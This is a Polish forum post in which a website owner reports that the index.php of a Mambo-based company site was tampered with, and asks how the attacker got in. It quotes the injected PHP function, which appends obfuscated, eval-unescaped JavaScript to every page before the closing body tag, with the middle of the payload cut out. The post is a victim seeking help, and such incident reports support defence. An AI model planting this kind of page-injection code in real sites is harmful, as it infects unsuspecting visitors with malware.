witam,

dzisiaj calkowicie przypadkiem odkrylem ze od 8 lipca wisi zamiast mojej strony firmowej strona owszem nadal firmowa ale z doklejonym kodem na koncu...

chcialbym ustalic zrodlo - nie tyle kto ale jak - doklejenia kodu.

fragment kodu strony jaki zostal doklejony to:
Kod:
<?php
function phpfake($buffer)
{
  $Exp='<script language="javascript">$="%64b%3d%22%3c7 (...tutaj reszta tego kodu - wycialem zbedny fragment...)74o%47MTS%74ri%6e%67%28);}%3b";eval(unescape($));document.write($);</script>';
  return (ereg_replace("</body>", "$Exp</body>", $buffer));
}
?>
do glowy by mi nie przyszlo sprawdzac gdyby nie to ze zainstalowalem sobie wczoraj avasta a dzis wlazlem na swoja strone...bum komunikat ze znalazl malware. Przejrzalem pobieznie pliki i wyglada ze tylko index.php w glownym katalogu zostal tak potraktowany.

czy ktos jest w stanie mnie naprowadzic na zrodlo problemu?
strona wisi na serwerze netartu (nazwa.pl) i jest na mambo pl 4.5.3

pytanie ogolne: czy na kontach takich jakie ma netart mozna z powodu bledu w kodzie strony uzyskac prawa zapisu do pliku jesli - po sprawdzeniu - prawo zapisu ma tylko owner? osobiscie mam wrazenie ze ktos zrobil wjazd do nazwa.pl ale nie chce rzucac zadnych oskarzen dopoki nie bede pewien ze to moja czy ich wina... celuje w moją ale hmmm chce sie poradzic doswiadczonych bardziej kolegow...